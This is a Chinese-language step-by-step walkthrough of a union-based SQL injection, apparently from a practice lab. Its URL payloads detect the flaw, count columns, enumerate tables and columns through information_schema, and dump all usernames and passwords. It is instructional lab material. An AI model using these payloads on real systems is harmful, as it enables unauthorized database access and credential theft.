一、判断是否存在注入,注入是字符型还是数字型。
?id=1,正常
?id=1' ,加上“ ' ”后,报错,所以可能存在字符型输入。
?id=1%27--+ ,用--+注释掉以后,正常。
所以存在单引号字符型注入。
二、猜解SQL查询语句中的字段数。
?id=1' order by 1--+ ,查询成功。
?id=1' order by 2--+ ,查询成功。
?id=1' order by 3--+ ,查询成功。
?id=1' order by 4--+ ,查询失败。
说明字段数为3。
三、确定回显位(找注入点)。
?id=-1' union select 1,2,3--+ ,让id值为-1,数据库里面没有id值为-1,所以返回union select的结果。这里2和3就是回显位,所以在2和3处可以输入MYSQL语句。
四、获取当前数据库。
在2、3处查询当前数据库名、版本。
五、获取数据库中的表。
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
(database()换成'security' 也可以,因为当前数据库为security,一定要给数据库名加单引号。)
(MYSQL5.0以上版本中,存在一个information_schema,存储了所有数据库名、表名、列名;information_schema.tables为记录所有表名信息的表;table_schema表示数据库名)
六、获取表中的字段名。
查询指定表名users中的列名信息。
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
列名包括: USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password
七、爆用户名和密码,下载数据。
?id=-1' union select 1,group_concat(username),group_concat(password) from users--+
成功获得所有用户名和密码。